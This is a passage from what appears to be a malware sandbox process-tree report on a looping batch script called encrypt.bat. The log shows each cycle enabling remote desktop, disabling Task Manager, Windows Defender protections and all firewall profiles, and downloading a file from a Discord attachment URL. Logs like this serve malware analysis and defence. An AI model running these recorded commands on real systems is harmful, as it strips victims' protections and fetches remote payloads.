C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"8⤵
- Command and Scripting Interpreter: PowerShell
PID:2640 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"8⤵
- Command and Scripting Interpreter: PowerShell
PID:1788 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"8⤵
- Command and Scripting Interpreter: PowerShell
PID:1936 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"8⤵
- Blocklisted process makes network request
PID:4132 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"8⤵PID:2276
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"9⤵PID:4404
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"10⤵PID:936
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f10⤵PID:2384
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"10⤵PID:2144
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f10⤵PID:3624
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"10⤵PID:4796
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"10⤵PID:5032
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"10⤵PID:4980
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"10⤵PID:2936
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"10⤵PID:32
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable10⤵PID:2452
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE10⤵
- Modifies Windows Firewall
PID:4012 -
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off10⤵PID:640
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off10⤵
- Modifies Windows Firewall
PID:204 -
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off10⤵PID:4220
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off10⤵PID:3040
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off10⤵
- Modifies Windows Firewall
PID:2204 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"10⤵PID:3688
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"10⤵PID:4004
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"10⤵PID:3852
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"10⤵PID:2956
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"10⤵
- Command and Scripting Interpreter: PowerShell
PID:3832 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"10⤵
- Command and Scripting Interpreter: PowerShell
PID:4232 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"10⤵
- Blocklisted process makes network request
PID:1308 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"10⤵PID:3664
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"11⤵PID:2360
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"12⤵PID:32
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f12⤵PID:2640
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"12⤵PID:4500
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f12⤵PID:2948
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"12⤵
- Command and Scripting Interpreter: PowerShell
PID:3076 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"12⤵
- Command and Scripting Interpreter: PowerShell
PID:292 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"12⤵PID:3632
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"12⤵PID:3256
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"12⤵
- Command and Scripting Interpreter: PowerShell
PID:3348 -
C:\Windows\system32\netsh.exenetsh firewall set opmode disable12⤵PID:2288
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE12⤵
- Modifies Windows Firewall
PID:5104 -
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off12⤵
- Modifies Windows Firewall
PID:428 -
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off12⤵
- Modifies Windows Firewall
PID:2700 -
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off12⤵
- Modifies Windows Firewall
PID:2320 -
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off12⤵
- Modifies Windows Firewall
PID:2932 -
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off12⤵
- Modifies Windows Firewall
PID:2240 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"12⤵
- Command and Scripting Interpreter: PowerShell
PID:992 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"12⤵PID:4252
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"12⤵PID:5040
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"12⤵PID:4992
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"12⤵
- Command and Scripting Interpreter: PowerShell
PID:1576 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"12⤵PID:2700
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"12⤵
- Blocklisted process makes network request
PID:4964 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"12⤵PID:1712
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"13⤵PID:2748
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"14⤵PID:1440
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f14⤵PID:4004
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"14⤵PID:2320
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f14⤵PID:860
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"14⤵
- Command and Scripting Interpreter: PowerShell
PID:2964 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"14⤵PID:4636
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"14⤵PID:3648
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"14⤵PID:2304
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"14⤵PID:2204
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable14⤵
- Modifies Windows Firewall
PID:1108 -
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE14⤵
- Modifies Windows Firewall
PID:4996 -
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off14⤵PID:3852
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off14⤵
- Modifies Windows Firewall
PID:2596 -
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off14⤵
- Modifies Windows Firewall
PID:3928 -
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off14⤵
- Modifies Windows Firewall
PID:3648 -
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off14⤵PID:376
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"14⤵PID:1100
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"14⤵PID:1968
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"14⤵PID:3688
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"14⤵PID:5084
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"14⤵
- Command and Scripting Interpreter: PowerShell
PID:2792 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"14⤵PID:4132
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"14⤵
- Blocklisted process makes network request
PID:4584 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"14⤵PID:1168
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"15⤵PID:1048
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"16⤵PID:504
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f16⤵PID:4932
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"16⤵PID:592
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f16⤵PID:676
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"16⤵PID:3852
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"16⤵PID:2300
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"16⤵PID:2440
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"16⤵
- Command and Scripting Interpreter: PowerShell
PID:2948 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"16⤵
- Command and Scripting Interpreter: PowerShell
PID:4584 -
C:\Windows\system32\netsh.exenetsh firewall set opmode disable16⤵
- Modifies Windows Firewall
PID:2748 -
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE16⤵
- Modifies Windows Firewall
PID:640 -
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off16⤵PID:592
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off16⤵PID:1916
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off16⤵PID:5084
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off16⤵PID:4408
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off16⤵
- Modifies Windows Firewall
PID:3100 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"16⤵
- Command and Scripting Interpreter: PowerShell
PID:2964 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"16⤵
- Command and Scripting Interpreter: PowerShell
PID:4684 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"16⤵PID:2360
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"16⤵
- Command and Scripting Interpreter: PowerShell
PID:3472 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"16⤵PID:3364
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"16⤵PID:2072
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"16⤵
- Blocklisted process makes network request
PID:1468 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"16⤵PID:4408
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"17⤵PID:376
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"18⤵PID:3812
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f18⤵PID:744
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"18⤵PID:1540
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f18⤵PID:4608
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"18⤵
- Command and Scripting Interpreter: PowerShell
PID:792 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"18⤵PID:420
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"18⤵PID:204
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"18⤵PID:992
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"18⤵
- Command and Scripting Interpreter: PowerShell
PID:3652 -
C:\Windows\system32\netsh.exenetsh firewall set opmode disable18⤵
- Modifies Windows Firewall
PID:5024 -
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE18⤵PID:4356
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off18⤵PID:2792
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off18⤵
- Modifies Windows Firewall
PID:904 -
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off18⤵PID:3472
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off18⤵
- Modifies Windows Firewall
PID:1424 -
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off18⤵PID:3336
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"18⤵PID:1560
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"18⤵PID:996
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"18⤵
- Command and Scripting Interpreter: PowerShell
PID:2240 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"18⤵
- Command and Scripting Interpreter: PowerShell
PID:4196 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"18⤵
- Command and Scripting Interpreter: PowerShell
PID:2436 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"18⤵PID:4148
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"18⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:4408 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"18⤵PID:860
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"19⤵PID:3348
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"20⤵PID:4728
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f20⤵PID:4004
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"20⤵PID:32
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f20⤵PID:4584
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"20⤵PID:4232
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"20⤵PID:4624
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"20⤵PID:2192
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"20⤵PID:996
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"20⤵
- Command and Scripting Interpreter: PowerShell
PID:4740 -
C:\Windows\system32\netsh.exenetsh firewall set opmode disable20⤵PID:428
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE20⤵
- Modifies Windows Firewall
PID:4108 -
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off20⤵
- Modifies Windows Firewall
PID:3964 -
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off20⤵
- Modifies Windows Firewall
PID:2748 -
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off20⤵
- Modifies Windows Firewall
PID:4196 -
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off20⤵
- Modifies Windows Firewall
PID:2192 -
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off20⤵
- Modifies Windows Firewall
PID:3316 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"20⤵PID:780
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"20⤵PID:2452
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"20⤵PID:992
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"20⤵
- Command and Scripting Interpreter: PowerShell
PID:4880 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"20⤵PID:3680
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"20⤵PID:3344
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"20⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:5032 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"20⤵PID:4636
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"21⤵PID:4500
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"22⤵PID:4132
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f22⤵PID:1888
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"22⤵PID:4996
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f22⤵PID:1308
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"22⤵PID:3208
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"22⤵PID:3484
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"22⤵PID:4004
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"22⤵
- Command and Scripting Interpreter: PowerShell
PID:1560 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"22⤵
- Command and Scripting Interpreter: PowerShell
PID:4112 -
C:\Windows\system32\netsh.exenetsh firewall set opmode disable22⤵
- Modifies Windows Firewall
PID:1304 -
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE22⤵
- Modifies Windows Firewall
PID:792 -
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off22⤵PID:3936
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off22⤵
- Modifies Windows Firewall
PID:2192 -
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off22⤵PID:4016
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off22⤵PID:1048
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off22⤵PID:3256
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"22⤵PID:4240
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"22⤵PID:1284
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"22⤵PID:744
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"22⤵PID:4204
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"22⤵PID:5108
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"22⤵
- Command and Scripting Interpreter: PowerShell
PID:2232 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"22⤵
- Blocklisted process makes network request
PID:1832 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"22⤵PID:4232
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"23⤵PID:1528
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"24⤵PID:4664
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f24⤵PID:4708
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"24⤵PID:4240
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f24⤵PID:1256
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"24⤵PID:1468
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"24⤵PID:676
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"24⤵PID:4216
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"24⤵PID:1436
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"24⤵PID:4916
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable24⤵PID:4964
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE24⤵PID:1536
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off24⤵
- Modifies Windows Firewall
PID:1800 -
